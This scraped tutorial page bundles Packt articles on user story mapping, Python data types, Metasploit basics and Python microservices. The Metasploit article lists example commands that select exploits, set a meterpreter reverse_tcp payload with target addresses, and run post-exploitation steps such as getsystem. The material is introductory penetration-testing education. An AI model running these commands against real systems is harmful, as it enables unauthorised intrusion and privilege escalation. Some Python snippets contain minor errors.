simple technique, like user story mapping, could save millions of dollars for a company. (For more resources related to this topic, see here.) Just tell the story Drawing a map, any map will lead to solving the problem. User story maps aim to replace document hand-overs with discussions and collaboration. Enterprises tend to have some sort of formal approval process, usually with a sign-off. That's perfectly fine, and most of the time unavoidable. Just make sure, that the sign-off happens after the mapping and story discussions. Ideally, right after the discussion, not days or weeks later. There is a reason why product manager, UX experts and all stakeholders love stories: they are humans. As such, we all have a natural tendency to love an emotionally satisfying tale. Most of our entertainment revolves around stories, and we want to hear good stories. A great story revolves around conflicts in a memorable and exciting way. How to tell a story? Telling a story is an easy task. We all did that as kids, yet we tend to forget about that skill we possess when we get into a serious product management discussion. How to tell a great story? There are a few rules to consider, the most important one is that you should talk about something that captivates the audience. The audience You should focus on the audience. What are their problems? What would make them listen actively, instead of texting or catching Pokémon, while at a user story discussion? Even if the project is about scratching your own itch, you should spin the story so it's their itch that is scratched. Engaging the audience can be indeed a challenge. Once upon atimeI have written a sci-fi novel. Actually, it was published in 2000, with the title Tűzsugár, in Hungarian.The English title would be Ray of Fire, but fortunately for my future writing career, it was never translated into English. The bookhad everything my 15-16 years old self consideredfun: For instance a great space war or passionate love between members of different sapient spacefaring races. The characters were miscellaneous human and non-human life-forms stuck in a spaceship for most of the story. Some of my characters had a keen resemblance to miscellaneous video-game characters, from games like Mortal Kombat 2 or Might & Magic VI. They certainly lacked emotional struggles over insignificant things like mass-murder or the end of the universe. As I certainly hope you will never read that book, I will spoiler you the end. A whole planet died, hinting that the entire galaxy might share the same fate, with a faint hope for salvation. This could have led to a sequel, but fortunately for all sci-fi lovers, I stopped writing the sequel after nine chapters. The book seemed to be a success. A national TV channel made an interview with me, if that’s any measure of success. More importantly, I had lots of fun writing it. But the book itself was hard to understand and probably impossible to appreciate. My biggest mistake was writing only what I considered fun. To be honest, I still write for fun, but now Ihave an audience in mind. I tell the story of my passion for user experience mapping to a great audience: you. I try to find things that are fun to write and still interesting to my target audience. As a true UX geek, I create the main persona of my audience before writing anything and tell a story to her. This article’s main persona is called Maya, and she shares many traits with my daughter. Could I say, I'm writing this book to my daughter? Of course, I do, but I keep in mind all otherpersonas. Hopefully one of them is a bit like you. Before a talk at a conference, I always ask the organizers about the audience. Even if the topic stays the same, the audience completely changes the story and the way I present it. I might tell the same user story differently to one of my team members, to the leader of another team, or to a chief executive. Differently internally, to a client or a third party. When telling a story, contrary to a written story, you will see an immediate feedback or the lack of it from your audience. You should go even further and shape the story based on this feedback. Telling a story is an interactive experience. Engage with the audience. Ask them questions, and let them ask you questions as a start, then turn this into a shared storytelling experience, where the story is being told by all participants together (not at the same time, though, unless you turn the workshop into a UX carol). When you tell a fairy-tale to your daughter, she might ask you why can't theprincessescape using her sharp wits and cunning, instead of relying on a prince challenging the dragon to a bloody duel. (Then you might start appreciating the story of the My Little Pony where the girl ponies solve challenges mostly non-violently while working together as a team of friends, instead of acting as a prize to be won.) So why not spin a tale of heroic princesses with fluffy pink cats? Start with action Beginningin medias res, as in starting the narrative in the midst of action is a technique used by masters, such as Shakespeare or Homer, and it is also a powerful tool in your user story arsenal. While telling a story, always try to add as little background as possible, and start with drama or something to catch the attention of the audience, whenever possible. At the beginning of TheOdyssey quite a few unruly men want to marry Telemachus' mother, while his father has still not returned home from the Trojan War. There is no lengthy introduction explaining how those men ended up in Ithaca, or why the goddess, flashing-eyed Athena cares about Odysseus. The poem was composed in an oral tradition and was more likely to be heard thanreadat the time of composition. While literacy skyrocketed since Homer's time, you want to tell and discuss your user stories. Therefore you should consider a similar start. (Maybe not mentioning the user's mother or her rascally suitors.) Simplify In literary fiction, a complex story can be entertaining. A Game of Thrones and its sequels inA Song of Ice and Fireseries is a good example for that. The thing is, George R. R. Martin writes those novels, and he certainly has no intention to discuss them during sprint planning meetings with stakeholders. User Story Maps are more similar to sagas, folktales and other stories formed in an oral tradition. They develop in a discussion, and their understandability is granted by their simplicity. We need to create a map as simple and small as possible, with as few story cards as possible. So how big should the story map be? Jim Shore definesstory card hell as something that happens when you have 300 story cards and you have to keep track of them. Madness, huh? This is not Sparta! Sorry Jim for the bad pun, but you are absolutely right, in the 300 range, you will not understand the map, and the whole discussion part will completely fail. The user stories will be lost, and the audience will not even try to understand what's happening. There is no ideal number of cards in a story map but aim low. Then eliminate most of the cards. Clutter will destroy the conversation. In most card games you will have from two to seven cards in hand, with some rare exceptions. The most popular card game both online and offline is Texas Hold 'em Poker. In that game, each player is dealt only two cards. This is because human thought processes and discussions work best with a small number of objects. Sometimes the number of objects in the real world is high. Our mind is good at simplifying, classifying and grouping things into manageable units. With that said, most books and conference presentations about user story mapping show us a photo of a wall covered with sticky notes. The viewer will have absolutely no idea what's on them, but one thing is certain, it looks like acomplex project. I have a bad news for you: projects with a complex user story map never get finished, and if they do get finished to a degree they will fail. The abundance of sticky notes means that the communication and simplification process needs one or more iterations. Throw away most of the sticky notes! To do that, you need to understand the problem better. Tell the story of your passion Seriously. Find someone, and tell her the user story of the next big thing. The app or hardware which will change the world. Try it now. Be bold and let your imagination flow. I believe that in this century we will be able to digitalize human beings. This will be the key to both humankind's survival as a species and our exploration of the space. The digital society would have no famine, no plagues and no poverty. This would solve all major problems we face today. Digital humans would even defeat death. Sounds like a wild sci-fi idea? It is, but then again, smartphones were also a wild sci-fi idea a few decades ago. Now I will tell you the story of something we can build today. The grocery surplus webshop We will create the user story map for a grocery surplus webshop. Using this eCommerce site, we will sell clearancefood and drink at a discount price. This means food, that would be thrown away at a regular store. For example food past its expiry date or with damaged packaging.This idea is popular in developed countries, like Denmark or the UK, and it might help cutting down on the amounts of food wasted every year, totaling 1.3 billion metric tonnes worldwide. We are trying to create the online-only version of WeFood (https://donate.danchurchaid.org/wefood). Our users can be environmentally conscious shoppers or low-income families with limited budgets just to give two examples. In this article I will not introduce personas, and treat them separately, so for now, we will only think about them as shoppers. The opportunity to scratch your own itch Mapping will help you to achieve the most, with as little as possible. In other words: maximize the opportunity, while minimizing the outputs. To use the mapping lingo: The outputs are products of the map’s usage, while the outcomes are the results. The opportunity is the desired outcome we plan to achieve with the aid of the map. This is how we want to change the world. We should start the map with the opportunity. The opportunity should not be defined as selling surplus food and drink to our visitors. If you approach a project or a business without solving the users' problem the project might become a failure. The best way to find out what our user want is through valid user research, remote and lab-based user experience testing. Sometimes we need to settle with the second best solution, which happens to be free. That’ssolving your own problem, in other words,scratch your own itch. Probably the best summary of this mantra comes from Jason Fried, the founder and CEO of Basecamp: “When you solve your own problem, you create a tool that you're passionate about. And passion is key. Passion means you'll truly use it and care about it. And that's the best way to get others to feel passionate about it too.” (Getting Real: The Smarter, Faster, Easier Way to Build a Successful Web Application) We will create the web store we would love to use. Although, as the cliché goes, there is noI inteam, but there is certainly an I inwriter. My ideal eCommerce site could be different to yours. When following the examples of this article, please try to think of your itch, your ideal web store, and use my words only as guidance. You can create the user story map for any other project, ideally something you are passionate about. I would encourage you to pick something that's not a webshop, or maybe not even a digital product if you feel adventurous. You need the tell the story of your passion. (No, not that passion. This is not an adults-only website.) My passion is reducing food waste (that's also the poor excuse I'm using when looking at the bathroom scale). Here is my attempt to phrase the opportunity. The opportunity: Our shoppers want to save money while reducing global food waste. They understand and accept what surplus food and drink means, and they are happy to shop with us. Actually, the first sentence would be enough. Remember, you want to have a simple one or two sentence opportunity definition. I ended up working for two tapestry web shops as a consultant. Not at the same time, though, and the second company approached me mostly as the result of how successful the first one was. It's a relatively small industry in Europe, and business owners and decision-makers know each other by name. I still recall the pleasant experience I had meeting the owners of the first web shop. They invited me to dinner at a homely restaurant in Budapest.We had a great discussion and they shared their passion. They were an elderly couple, so they must have spent most of their life in the communist era. In the early 90's they decided to start a business, selling tapestry in a brick and mortar store. Obviously, they had no background in management or running acapitalist business, but that didn't matter, they only wanted to help people to make their homes beautiful. They loved tapestry, so they started importing and selling it. When I visited their physical store I have seen them talking to a customer. They spent more than an hour discussing interior decoration with someone, who just popped by to ask the square meter prices of tapestry. Tapestry is not sold per square meter, but they did the math for the customer among many other things. They showed her many different patterns, types and discussed application methods. After leaving the shop the customer knew more about tapestry than most other people ever will. Fast forward to the second contract. I only talked to the client on Skype, and that's perfectly fine because most of my clients don't invite me to dinner. I saw many differences in this client's approach to the previous one. At some point, I asked him “Why do you sell tapestry? Is tapestry your passion?” He was a bit startled by the question, but he promptly replied: “To make money, why else? You need to be pretty crazy to have tapestry as a passion.” Seven years later the second business no longer exists, yet the first one is still successful. Treating your work as your passion works wonders. Passion is an important contributor to the success of an idea. Whenever possible, pour your passion into a product and summarize it as the opportunity. What’s next? If you buy my new book, User Experience Mapping, you will find more about user story maps in the second chapter. In that chapter, we will explore user story maps, and how they help you to create requirements through collaboration (and a few sticky notes): We will create user stories and arrange them as a user story map. We will discuss the reasons behind creating them. We will learn how to tell a story. The grocery surplus webshop's user story map will be the example I will create in this chapter. To do this, we will explore user story templates, characteristics of a good user story (INVEST) and epics. With the 3 Cs (Card, Conversation and Confirmation) process we will turn the stories into reality. We will create a user story map on a wall with sticky notes Then digitally using StoriesOnBoard. And that’s just the second chapter, each of the eleven chapters contains different user experience maps. The book reveals two advanced mapping techniques for the first time in print, the behavioural change map and the 4D UX map. You will also explore user story maps, task models and journey maps. You will create wireflows, mental model maps, ecosystem maps and solution maps. In this book, we will show you how to use insights from real users to create and improve your maps and your product. Start mapping your products now to change your users’ lives! Resources for Article: Further resources on this subject: Learning D3.js Mapping Data Acquisition and Mapping Creating User Interfaces

0
0
933

How-To Tutorials

Packt

22 Jun 2017

4 min read

Inbuilt Data Types in Python

Packt

22 Jun 2017

4 min read

This article by Benjamin Baka, author of the book Python Data Structures and Algorithm, explains the inbuilt data types in Python. Python data types can be divided into 3 categories, numeric, sequence and mapping. There is also the None object that represents a Null, or absence of a value. It should not be forgotten either that other objects such as classes, files and exceptions can also properly be considered types, however they will not be considered here. (For more resources related to this topic, see here.) Every value in Python has a data type. Unlike many programming languages, in Python you do not need to explicitly declare the type of a variable. Python keeps track of object types internally. Python inbuilt data types are outlined in the following table: Category Name Description None None The null object Numeric int Integer float Floating point number complex Complex number bool Boolean (True, False) Sequences str String of characters list List of arbitrary objects Tuple Group of arbitrary items range Creates a range of integers. Mapping dict Dictionary of key – value pairs set Mutable, unordered collection of unique items frozenset Immutable set None type The None type is immutable and has one value, None. It is used to represent the absence of a value. It is returned by objects that do not explicitly return a value and evaluates to False in Boolean expressions. It is often used as the default value in optional arguments to allow the function to detect if the caller has passed a value. Numeric Types All numeric types, apart from bool, are signed and they are all immutable. Booleans have two possible values, True and False. These values are mapped to 1 and 0 respectively. The integer type, int, represents whole numbers of unlimited range. Floating point numbers are represented by the native double precision floating point representation of the machine. Complex numbers are represented by two floating point numbers. they are assigned using the j operator to signify the imaginary part of the complex number. For example : a = 2+3j We can access the real and imaginary parts by a.real and a.imag respectively. Representation error It should be noted that the native double precision representation of floating point numbers leads to some unexpected results. For example, consider the following: In[14]: 1-0.9 Out[14]: 0.09999999999998 In [15]: 1-0.9 == 0.1 Out[15]: False This is a result of the fact that most decimal fractions are not exactly representable as a binary fraction, which is how most underlying hardware represents floating point numbers. For algorithms or applications where this may be an issue Python provides a decimalmodule. This module allows for the exact representation of decimal numbers and facilitates greater control properties such as rounding behaviour, number of significant digits and precision. It defines two objects, a Decimal type, representing decimal numbers and a Context type, representing various computational parameters such as precision, rounding and error handling. An example of its usage can be seen in the following: In [1]: import decimal In[2]: x = decimal.Decimal(3.14); y=decimal.Decimal(2.74) In[3]: x*y Out[3]: Decimal (‘8.60360000000001010036498883’) In[4]: decimal.getcontext().prec = 4 In[5]: x * y Out[5]: Decimal(‘8.604’) Here we have created a global context and set the precision to 4. The Decimal object can be treated pretty much as you would treat an int or a float. They are subject to all the same mathematical operations and can be used as dictionary keys, placed in sets and so on. In addition, Decimal objects also have several methods for mathematical operations such as natural exponents x.exp(), natural logarithms, x.ln() and base 10 logarithms, x.log10(). Python also has a fractions module that implements a rational number type. The following shows several ways to create fractions: In [62]: import fractions In [63]: fractions Fraction(3,4) #creates the fraction ¾ Out[63]: Fraction(3,4) In [64]: fraction Fraction(0,5) #creates a fraction from a float Out[64]: Fraction(1,2) In [65]: fraction Fraction(“.25”) #creates a fraction from a string Out[65]: Fraction(1,4) It is also worth mentioning here the NumPy extension. This has types for mathematical objects such as arrays, vectors and matrixes and capabilities for linear algebra, calculation of Fourier transforms, eigenvectors, logical operations and much more. Summary We have looked at the built in data types and some internal Python modules, most notable the collections module. There are a number of external libraries such as the SciPy stack, and, likewise. Resources for Article: Further resources on this subject: Python Data Structures [article] Getting Started with Python Packages [article] An Introduction to Python Lists and Dictionaries [article]

0
0
2412

article-image-getting-started-metasploit

Packt

22 Jun 2017

10 min read

Getting Started with Metasploit

Packt

22 Jun 2017

10 min read

In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics: Fundamentals of Metasploit Benefits of using Metasploit (For more resources related to this topic, see here.) Penetration testing is an art of performing a deliberate attack on a network, web application, server or any device that require a thorough check up from the security perspective. The idea of a penetration test is to uncover flaws while simulating real world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in the systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered as one of the most practical tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more. The fundamentals of Metasploit Now that we have completed the setup of Kali Linux let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features. Metasploit comes in various editions, as follows: Metasploit pro: This edition is a commercial edition, offers tons of great features such as web application scanning and exploitation, automated exploitation and is quite suitable for professional penetration testers and IT security teams. Pro edition is used for advanced penetration tests and enterprise security programs. Metasploit express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute forcing of the credentials, and much more. This version is quite suitable for IT security teams to small to medium size companies. Metasploit community: This is a free version with reduced functionalities of the express edition. However, for students and small businesses, this edition is a favorable choice. Metasploit framework: This is a command-line version with all manual tasks such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers. You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/ We will be using the Metasploit community and framework version.Metasploit also offers various types of user interfaces, as follows: The graphical user interface(GUI): This has all the options available at a click of a button. This interface offers a user-friendly interface that helps to provide a cleaner vulnerability management. The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all in one approach to all the options offered by Metasploit. This interface is also considered one of the most stable interfaces. The command-line interface: This is the more potent interface that supports the launching of exploits to activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job. Armitage: Armitage by Raphael Mudge added a neat hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortanascripting language. Basics of Metasploit framework Before we put our hands onto the Metasploit framework, let us understand basic terminologies used in Metasploit. However, the following modules are not just terminologies but modules that are heart and soul of the Metasploit project: Exploit: This is a piece of code, which when executed, will trigger the vulnerability at the target. Payload: This is a piece of code that runs at the target after a successful exploitation is done. It defines the type of access and actions we need to gain on the target system. Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more. Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall. Meterpreter: This is a payload that uses in-memory stagers based on DLL injections. It provides a variety of functions to perform at the target, which makes it a popular choice. Architecture of Metasploit Metasploit comprises of various components such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows: Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of various libraries as explained in the following table: Library name Uses REX Handles almost all core functions such as setting up sockets, connections, formatting, and all other raw functions MSF CORE Provides the underlying API and the actual core that describes the framework MSF BASE Provides friendly API support to modules We have many types of modules in Metasploit, and they differ regarding their functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as shown in the following table: Module type Working Payloads Payloads are used to carry out operations such as connecting to or from the target system after exploitation or performing a particular task such as installing a service and so on. Payload execution is the next step after the system is exploited successfully. Auxiliary Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service and enumeration, and so on. Encoders Encoders are used to encode payloads and the attack vectors to (or intending to) evade detection by antivirus solutions or firewalls. NOPs NOP generators are used for alignment which results in making exploits stable. Exploits The actual code that triggers a vulnerability Metasploit framework console and commands Gathering knowledge of the architecture of Metasploit, let us now run Metasploit to get a hands-on knowledge about the commands and different modules. To start Metasploit, we first need to establish database connection so that everything we do can be logged into the database. However, usage of databases also speeds up Metasploit's load time by making use of cache and indexes for all modules. Therefore, let us start the postgresql service by typing in the following command at the terminal: root@beast:~# service postgresql start Now, to initialize Metasploit's database let us initialize msfdb as shown in the following screenshot: It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start the Metasploit's database using the following command: root@beast:~# msfdb start We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to startMetasploit as shown in the following screenshot: Welcome to the Metasploit console, let us run the help command to see what other commands are available to us: The commands in the preceding screenshot are core Metasploit commands which are used to set/get variables, load plugins, route traffic, unset variables, printing version, finding the history of commands issued, and much more. These commands are pretty general. Let's see module based commands as follows: Everything related to a particular module in Metasploit comes under module controls section of the Help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core, and advanced options related to a module and even can edit a module inline. Let us learn some basic commands in Metasploit and familiarize ourselves to the syntax and semantics of these commands: Command Usage Example use [auxiliary/exploit/payload/encoder] To select a particular msf>use exploit/unix/ftp/vsftpd_234_backdoor msf>use auxiliary/scanner/portscan/tcp show[exploits/payloads/encoder/auxiliary/options] To see the list of available modules of a particular type msf>show payloads msf> show options set [options/payload] To set a value to a particular object msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112 msf> set LPORT 4444 msf> set RPORT 8080 setg [options/payload] To assign a value to a particular object globally, so the values do not change when a module is switched on msf>setgRHOST 192.168.10.112 run To launch an auxiliary module after all the required options are set msf>run exploit To launch an exploit msf>exploit back To unselect a module and move back msf(ms08_067_netapi)>back msf> Info To list the information related to a particular exploit/module/auxiliary msf>info exploit/windows/smb/ms08_067_netapi msf(ms08_067_netapi)>info Search To find a particular module msf>search hfs check To check whether a particular target is vulnerable to the exploit or not msf>check Sessions To list the available sessions msf>sessions [session number] Meterpreter commands Usage Example sysinfo To list system information of the compromised host meterpreter>sysinfo ifconfig To list the network interfaces on the compromised host meterpreter>ifconfig meterpreter>ipconfig (Windows) Arp List of IP and MAC addresses of hosts connected to the target meterpreter>arp background To send an active session to background meterpreter>background shell To drop a cmd shell on the target meterpreter>shell getuid To get the current user details meterpreter>getuid getsystem To escalate privileges and gain system access meterpreter>getsystem getpid To gain the process id of the meterpreter access meterpreter>getpid ps To list all the processes running at the target meterpreter>ps If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commandsfor more information on basic commands Benefits of using Metasploit Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors which are listed as follows: Metasploit framework is open source Metasploit supports large testing networks by making use of CIDR identifiers Metasploit offers quick generation of payloads which can be changed or switched on the fly Metasploit leaves the target system stable in most of the cases The GUI environment provides a fast and user-friendly way to conduct penetration testing Summary Throughout this article, we learned the basics of Metasploit. We learned about various syntax and semantics of Metasploit commands. We also learned the benefits of using Metasploit. Resources for Article: Further resources on this subject: Approaching a Penetration Test Using Metasploit [article] Metasploit Custom Modules and Meterpreter Scripting [article] So, what is Metasploit? [article]

0
0
17382

article-image-understanding-microservices

Packt

22 Jun 2017

19 min read

Understanding Microservices

Packt

22 Jun 2017

19 min read

This article by Tarek Ziadé, author of the book Python Microservices Development explains the benefits and implementation of microservices with Python. While the microservices architecture looks more complicated than its monolithic counterpart, its advantages are multiple. It offers the following benefits. (For more resources related to this topic, see here.) Separation of concerns First of all, each microservice can be developed independently by a separate team. For instance, building a reservation service can be a full project on its own. The team in charge can make it in whatever programming language and database, as long as it has a well-documented HTTP API. That also means the evolution of the app is more under control than with monoliths. For example, if the payment system changes its underlying interactions with the bank, the impact is localized inside that service and the rest of the application stays stable and under control. This loose coupling improves a lot the overall project velocity as we're applying at the service level a similar philosophy than the single responsibility principle. The single responsibility principle was defined by Robert Martin to explain that a class should have only one reason to change - in other words, each class should be providing a single, well-defined feature. Applied to microservices, it means that we want to make sure that each microservice focuses on a single role. Smaller projects The second benefit is breaking the complexity of the project. When you are adding a feature to an application like the PDF reporting, even if you are doing it cleanly, you are making the base code bigger, more complicated and sometimes slower. Building that feature in a separate application avoids this problem, and makes it easier to write it with whatever tools you want. You can refactor it often and shorten your release cycles, and stay on the top of things. The growth of the application remains under your control. Dealing with a smaller project also reduces risks when improving the application: if a team wants to try out the latest programming language or framework, they can iterate quickly on a prototype that implements the same microservice API, try it out, and decide whether or not to stick with it. One real-life example in mind is the Firefox Sync storage microservice. There are currently some experiments to switch from the current Python+MySQL implementation to a Go based one that stores users data in standalone SQLite databases. That prototype is highly experimental, but since we have isolated the storage feature in a microservice with a well-defined HTTP API, it's easy enough to give it a try with a small subset of the user base. Scaling and deployment Last, having your application split into components makes it easier to scale depending on your constraints. Let's say you are starting to get a lot of customers that are booking hotels daily, and the PDF generation is starting to heat up the CPUs. You can deploy that specific microservice in some servers that have bigger CPUs. Another typical example is RAM-consuming microservices like the ones that are interacting with memory databases like Redis or Memcache. You could tweak your deployments consequently by deploying them on servers with less CPU and a lot more RAM. To summarize microservices benefits: A team can develop each microservice independently, and use whatever technological stack makes sense. They can define a custom release cycle. The tip of the iceberg is its language agnostic HTTP API. Developers break the application complexity into logical components. Each microservice focuses on doing one thing well. Since microservices are standalone applications, there's a finer control on deployments, which makes scaling easier. Microservices architectures are good at solving a lot of the problems that may arise once your application is starting to grow. Although, we need to be aware of some of the new issues they also bring in practice. Implementing microservices with Python Python is an amazingly versatile language. As you probably already know, it's used to build many different kinds of applications, from simple system scripts that perform tasks on a server, to large object-oriented applications that run services for millions of users. According to a study conducted by Philip Guo in 2014, published in the Association for Computing Machinery (ACM) website, Python has surpassed Java in top U.S. universities and is the most popular language to learn Computer Science. This trend is also true in the software industry. Python sits now in the top 5 languages in the TIOBE index (http://www.tiobe.com/tiobe-index/), and it's probably even bigger in the web development land since languages like C are rarely used as main languages to build web applications. However, some developers criticize Python for being slow and unfit for building efficient web services. Python is slow, and this is undeniable. But it's still is a language of choice for building microservices, and many major companies are happily using it. This section will give you some background on the different ways you can write microservices using Python, some insights on asynchronous versus synchronous programming, and conclude with some details on Python performances. It's composed of 4 parts: The WSGI standard Greenlet & Gevent Twisted & Tornado asyncio Language performances The WSGI standard What strikes the most web developers that are starting with Python is how easy it is to get a web application up and running. The Python web community has created a standard inspired from the Common Gateway Interface (CGI) called Web Server Gateway Interface (WSGI) that simplifies a lot how you can write a Python application which goal is to serve HTTP requests. When your code is using that standard, your project can be executed by standard web servers like Apache or NGinx, using WSGI extensions like uwsgi or mod_wsgi. Your application just has to deal with incoming requests and send back JSON responses, and Python includes all that goodness in its standard library. You can create a fully functional microservice that returns the server's local time with a vanilla Python module of fewer than ten lines: import JSON import time def application(environ, start_response): headers = [('Content-type', 'application/json')] start_response('200 OK', headers) return bytes(json.dumps({'time': time.time()}), 'utf8') Since its introduction, the WSGI protocol became an essential standard and the Python web community widely adopted it. Developers wrote middlewares, which are functions you can hook before or after the WSGI application function itself, to do something within the environment. Some web frameworks were created specifically around that standard, like Bottle (http://bottlepy.org) - and soon enough, every framework out there could be used through WSGI in a way or another. The biggest problem with WSGI though is its synchronous nature. The application function you see above is called exactly once per incoming request, and when the function returns, it has to send back the response. That means that every time you are calling the function, it will block until the response is ready. And writing microservices means your code will be waiting for responses from various network resources all the time. In other words, your application will idle and just block the client until everything is ready. That's an entirely okay behavior for HTTP APIs. We're not talking about building bidirectional applications like web socket based ones. But what happens when you have several incoming requests that are calling your application at the same time? WSGI servers will let you run a pool of threads to serve several requests concurrently. But you can't run thousands of them, and as soon as the pool is exhausted, the next request will be blocking even if your microservice is doing nothing but idling and waiting for backend services responses. That's one of the reasons why non-WSGI frameworks like Twisted, Tornado and in Javascript land Node.js became very successful - it's fully async. When you're coding a Twisted application, you can use callbacks to pause and resume the work done to build a response. That means you can accept new requests and start to treat them. That model dramatically reduces the idling time in your process. It can serve thousands of concurrent requests. Of course, that does not mean the application will return each single response faster. It just means one process can accept more concurrent requests and juggle between them as the data is getting ready to be sent back. There's no simple way with the WSGI standard to introduce something similar, and the community has debated for years to come up with a consensus - and failed. The odds are that the community will eventually drop the WSGI standard for something else. In the meantime, building microservices with synchronous frameworks is still possible and completely fine if your deployments take into account the one request == one thread limitation of the WSGI standard. There's, however, one trick to boost synchronous web applications: greenlets. Greenlet & Gevent The general principle of asynchronous programming is that the process deals with several concurrent execution contexts to simulate parallelism. Asynchronous applications are using an event loop that pauses and resumes execution contexts when an event is triggered - only one context is active, and they take turns. Explicit instruction in the code will tell the event loop that this is where it can pause the execution. When that occurs, the process will look for some other pending work to resume. Eventually, the process will come back to your function and continue it where it stopped - moving from an execution context to another is called switching. The Greenlet project (https://github.com/python-greenlet/greenlet) is a package based on the Stackless project, a particular CPython implementation, and provides greenlets. Greenlets are pseudo-threads that are very cheap to instantiate, unlike real threads, and that can be used to call python functions. Within those functions, you can switch and give back the control to another function. The switching is done with an event loop and allows you to write an asynchronous application using a Thread-like interface paradigm. Here's an example from the Greenlet documentation def test1(x, y): z = gr2.switch(x+y) print z def test2(u): print u gr1.switch(42) gr1 = greenlet(test1) gr2 = greenlet(test2) gr1.switch("hello", " world") The two greenlets are explicitly switching from one to the other. For building microservices based on the WSGI standard, if the underlying code was using greenlets we could accept several concurrent requests and just switch from one to another when we know a call is going to block the request - like performing a SQL query. Although, switching from one greenlet to another has to be done explicitly, and the resulting code can quickly become messy and hard to understand. That's where Gevent can become very useful. The Gevent project (http://www.gevent.org/) is built on the top of Greenlet and offers among other things an implicit and automatic way of switching between greenlets. It provides a cooperative version of the socket module that will use greenlets to automatically pause and resume the execution when some data is made available in the socket. There's even a monkey patch feature that will automatically replace the standard lib socket with Gevent's version. That makes your standard synchronous code magically asynchronous every time it uses sockets - with just one extra line. from gevent import monkey; monkey.patch_all() def application(environ, start_response): headers = [('Content-type', 'application/json')] start_response('200 OK', headers) # ...do something with sockets here... return result This implicit magic comes with a price, though. For Gevent to work well, all the underlying code needs to be compatible with the patching Gevent is doing. Some packages from the community will continue to block or even have unexpected results because of this. In particular, if they use C extensions and bypass some of the features of the standard library Gevent patched. But for most cases, it works well. Projects that are playing well with Gevent are dubbed "green," and when a library is not functioning well, and the community asks its authors to "make it green," it usually happens. That's what was used to scale the Firefox Sync service at Mozilla for instance. Twisted and Tornado If you are building microservices where increasing the number of concurrent requests you can hold is important, it's tempting to drop the WSGI standard and just use an asynchronous framework like Tornado (http://www.tornadoweb.org/) or Twisted (https://twistedmatrix.com/trac/). Twisted has been around for ages. To implement the same microservices you need to write a slightly more verbose code: import time from twisted.web import server, resource from twisted.internet import reactor, endpoints class Simple(resource.Resource): isLeaf = True def render_GET(self, request): request.responseHeaders.addRawHeader(b"content-type", b"application/json") return bytes(json.dumps({'time': time.time()}), 'utf8') site = server.Site(Simple()) endpoint = endpoints.TCP4ServerEndpoint(reactor, 8080) endpoint.listen(site) reactor.run() While Twisted is an extremely robust and efficient framework, it suffers from a few problems when building HTTP microservices: You need to implement each endpoint in your microservice with a class derived from a Resource class, and that implements each supported method. For a few simple APIs, it adds a lot of boilerplate code. Twisted code can be hard to understand & debug due to its asynchronous nature. It's easy to fall into callback hell when you're chaining too many functions that are getting triggered successively one after the other - and the code can get messy Properly testing your Twisted application is hard, and you have to use Twisted-specific unit testing model. Tornado is based on a similar model but is doing a better job in some areas. It has a lighter routing system and does everything possible to make the code closer to plain Python. Tornado is also using a callback model, so debugging can be hard. But both frameworks are working hard at bridging the gap to rely on the new async features introduced in Python 3. asyncio When Guido van Rossum started to work on adding async features in Python 3, part of the community pushed for a Gevent-like solution because it made a lot of sense to write applications in a synchronous, sequential fashion - rather than having to add explicit callbacks like in Tornado or Twisted. But Guido picked the explicit technique and experimented in a project called Tulip that Twisted inspired. Eventually, asyncio was born out of that side project and added into Python. In hindsight, implementing an explicit event loop mechanism in Python instead of going the Gevent way makes a lot of sense. The way the Python core developers coded asyncio and how they elegantly extended the language with the async and await keywords to implement coroutines, made asynchronous applications built with vanilla Python 3.5+ code look very elegant and close to synchronous programming. By doing this, Python did a great job at avoiding the callback syntax mess we sometimes see in Node.js or Twisted (Python 2) applications. And beyond coroutines, Python 3 has introduced a full set of features and helpers in the asyncio package to build asynchronous applications, see https://docs.python.org/3/library/asyncio.html. Python is now as expressive as languages like Lua to create coroutine-based applications, and there are now a few emerging frameworks that have embraced those features and will only work with Python 3.5+ to benefit from this. KeepSafe's aiohttp (http://aiohttp.readthedocs.io) is one of them, and building the same microservice, fully asynchronous, with it would simply be these few elegant lines. from aiohttp import web import time async def handle(request): return web.json_response({'time': time.time()}) if __name__ == '__main__': app = web.Application() app.router.add_get('/', handle) web.run_app(app) In this small example, we're very close to how we would implement a synchronous app. The only hint we're async is the async keyword marking the handle function as being a coroutine. And that's what's going to be used at every level of an async Python app going forward. Here's another example using aiopg - a Postgresql lib for asyncio. From the project documentation: 